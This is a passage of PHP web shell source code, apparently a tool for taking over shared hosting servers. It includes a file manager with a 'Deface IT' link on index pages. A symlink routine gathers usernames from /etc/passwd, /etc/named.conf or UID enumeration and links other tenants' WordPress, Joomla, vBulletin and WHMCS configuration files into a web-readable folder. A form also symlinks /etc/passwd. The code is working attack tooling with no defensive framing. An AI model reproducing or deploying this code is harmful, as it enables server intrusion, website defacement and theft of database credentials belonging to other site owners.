1030 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1031 <?php if($os != 'Windows')
1032 {
1033 echo "<td align=center><font size=2>";
1034 echo getOGid($val)."</font></td>";
1035 } ?>
1036 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1037 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
1038 <td></td>
1039 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1040 </tr></font>
1041 <?php
1042 }
1043 else if(is_file($vv))
1044 {
1045 ?>
1046 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
1047 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
1048
1049 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
1050
1051 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1052
1053 <?php if($os != 'Windows')
1054 {
1055 echo "<td align=center><font size=2>";
1056 echo getOGid($val)."</font></td>";
1057 } ?>
1058 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1059
1060 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
1061 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
1062 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1063 </tr>
1064 <p>
1065 <?php
1066 }
1067 }
1068
1069 echo "</table>
1070<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
1071<select class=sbox name=choice style='width: 100px;'>
1072 <option value=delete>Delete</option>
1073 <option value=chmod>Change mode</option>
1074 if(class_exists('ZipArchive'))
1075 { <option value=compre>Compress</option>
1076 <option value=uncompre>Uncompress</option> }
1077 </select>
1078
1079 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
1080 }}
1081 else
1082 {
1083 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
1084 }
1085
1086}
1087if(isset($_REQUEST["script"]))
1088{
1089 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
1090 ?>
1091 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('manuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
1092 <td><a href=javascript:void(0) onClick="getdata('scriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
1093 </tr></table></center>
1094 <?php
1095}
1096else if(isset($_REQUEST['manuallyscript']))
1097{
1098 ?>
1099 <center>
1100 <form action="<?php echo $self; ?>" method="post">
1101 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
1102 <input type="button" OnClick="manuallyscriptfn(passwd.value)" value="Get Config" class="but">
1103 </form>
1104 </center>
1105 <?php
1106}
1107else if(isset($_REQUEST['scriptlocator']))
1108{
1109 if(stristr(php_uname(),"Linux"))
1110 {
1111 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1112 $path=explode('/',$url);
1113 $url =str_replace($path[count($path)-1],'',$url);
1114 function syml($usern,$pdomain)
1115 {
1116 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1117 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1118 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1119 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1120 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1121 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1122 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1123 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1124 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
1125 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1126 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1127 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1128 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1129 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1130 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1131 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1132 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1133 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1134 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1135 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1136 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1137 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1138 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1139 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1140 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1141 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1142 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1143 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1144 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1145 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1146 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1147 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1148 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1149 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1150 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1151 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1152 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1153 symlink('/home2/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1154 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1155 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1156 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb2.txt');
1157 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1158 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1159 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1160 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1161 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1162 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1163 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1164 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1165 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1166 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1167 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1168 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1169 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1170 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1171 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1172 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1173 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1174 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1175 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1176 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1177 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1178 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1179 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1180 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1181 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1182 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1183 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1184 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1185 symlink('/home3/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1186 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1187 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1188 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb3.txt');
1189 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1190 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1191 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1192 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1193 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1194 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1195 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1196 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1197 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1198 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1199 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1200 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1201 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1202 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1203 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1204 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1205 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1206 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1207 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1208 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1209 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1210 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1211 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1212 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1213 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1214 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1215 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1216 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1217 symlink('/home4/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1218 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1219 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1220 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb4.txt');
1221 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1222 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1223 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1224 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1225 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1226 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1227 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1228 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1229 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1230 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1231 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1232 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1233 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1234 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1235 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1236 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1237 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1238 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1239 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1240 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1241 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1242 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1243 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1244 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1245 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1246 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1247 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1248 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1249 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1250 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1251 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb5.txt');
1252 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1253 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1254 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1255 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1256 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1257 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1258 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1259 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1260 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1261 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1262 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1263 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1264 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1265 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1266 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1267 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1268 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1269 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1270 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1271 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1272 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1273 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1274 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1275 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1276 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1277 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1278 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1279 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1280 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1281 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1282 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1283 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1284 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1285 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1286 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1287 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1288 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1289 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1290 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1291 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1292 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1293 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1294 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1295 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1296 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1297 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1298 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1299 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1300 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1301 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1302 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1303 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1304 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1305 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1306 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1307 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1308 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1309 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1310 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1311 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1312 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb7.txt');
1313 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1314 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1315 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1316 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1317 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1318 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1319 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1320 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1321 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1322 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1323 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1324 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1325 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1326 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1327 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1328 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1329 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1330 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1331 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1332 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1333 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1334 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1335 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1336 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1337 }
1338 if(isset($_REQUEST['passwd']))
1339 {
1340 $getetc = trim($_REQUEST['passwd']);
1341
1342 mkdir("dhanushSPT");
1343 chdir("dhanushSPT");
1344
1345 $myfile = fopen("test.txt","w");
1346 fputs($myfile,$getetc);
1347 fclose($myfile);
1348
1349 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1350 while(!feof($file))
1351 {
1352 $s = fgets($file);
1353 $matches = array();
1354 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1355 $matches = str_replace("home/","",$matches[1]);
1356 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1357 continue;
1358 syml($matches,$matches);
1359 }
1360 fclose($file);
1361 unlink("test.txt");
1362 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1363 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1364
1365 }
1366 else
1367 {
1368 $d0mains = @file("/etc/named.conf");
1369 if($d0mains)
1370 {
1371 mkdir("dhanushST");
1372 chdir("dhanushST");
1373
1374 foreach($d0mains as $d0main)
1375 {
1376 if(eregi("zone",$d0main))
1377 {
1378 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1379 flush();
1380
1381 if(strlen(trim($domains[1][0])) > 2)
1382 {
1383 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1384
1385 syml($user['name'],$domains[1][0]);
1386 }
1387 }
1388 }
1389 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1390 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1391 }
1392 else
1393 {
1394 mkdir("dhanushSPT");
1395 chdir("dhanushSPT");
1396 $temp = "";
1397 $val1 = 0;
1398 $val2 = 1000;
1399 for(;$val1 <= $val2;$val1++)
1400 {
1401 $uid = @posix_getpwuid($val1);
1402 if ($uid)
1403 $temp .= join(':',$uid)."\n";
1404 }
1405 echo '<br/>';
1406 $temp = trim($temp);
1407
1408 $file5 = fopen("test.txt","w");
1409 fputs($file5,$temp);
1410 fclose($file5);
1411
1412
1413 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1414 while(!feof($file))
1415 {
1416 $s = fgets($file);
1417 $matches = array();
1418 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1419 $matches = str_replace("home/","",$matches[1]);
1420 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1421 continue;
1422 syml($matches,$matches);
1423 }
1424 fclose($file);
1425 echo "</table>";
1426 unlink("test.txt");
1427 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1428 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1429 }
1430 }
1431 }
1432 else
1433 echo "<center>Cannot Complete the task!!!!</center>";
1434
1435}
1436else if(isset($_GET["symlinkfile"]))
1437{
1438 if(!isset($_GET['file']))
1439 {
1440 ?>
1441 <center>
1442 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
1443 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
1444 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
1445 </form></center>
1446 <br><br>
1447 <?php
1448 }
1449}
1450
1451else if(isset($_GET['symlinkmyfile']))
1452{
1453 if(stristr(php_uname(),"Linux"))
1454 {
1455 $fakedir="cx";
1456 $fakedep=16;
1457
1458 $num=0; // offset of symlink.$num
1459
1460 if(!empty($_GET['myfile']))
1461 $file=$_GET['myfile'];
